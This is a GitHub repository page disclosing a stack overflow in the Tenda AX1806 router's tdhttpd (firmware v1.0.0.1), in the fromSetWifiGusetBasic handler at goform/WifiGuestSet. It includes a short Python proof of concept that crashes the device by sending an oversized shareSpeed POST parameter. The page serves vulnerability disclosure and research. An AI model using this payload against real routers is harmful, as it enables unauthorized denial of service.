IoT-vuln/Tenda/AX1806/fromSetWifiGusetBasic at main · d1tto/IoT-vuln

History

Name		Name	Last commit message	Last commit date
parent directory ..
image		image
readme.md		readme.md

readme.md

Overview

The device's official website: https://www.tenda.com.cn/product/AX1806.html
Firmware download website: https://www.tenda.com.cn/download/detail-3306.html

Affected version

v1.0.0.1

Vulnerability details

tdhttpd in directory /bin has stack overflow vulnerability. The vulnerability occurrs in the fromSetWifiGusetBasic function, which can be accessed via the URL goform/WifiGuestSet.

The function takes the POST parameter shareSpeed, does not validate its length, and copies it directly to a local variable acStack1888 on the stack, causing a stack overflow.

PoC

Poc of Denial of Service(DoS)

import requests

data = {
    b"shareSpeed": b'A'*0x800
}
res = requests.post("http://127.0.0.1/goform/WifiGuestSet", data=data)
print(res.content)

debug result:

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

fromSetWifiGusetBasic

fromSetWifiGusetBasic

readme.md

Overview

Affected version

Vulnerability details

PoC

Files

fromSetWifiGusetBasic

Directory actions

More options

Directory actions

More options

Latest commit

History

fromSetWifiGusetBasic

Folders and files

parent directory

readme.md

Overview

Affected version

Vulnerability details

PoC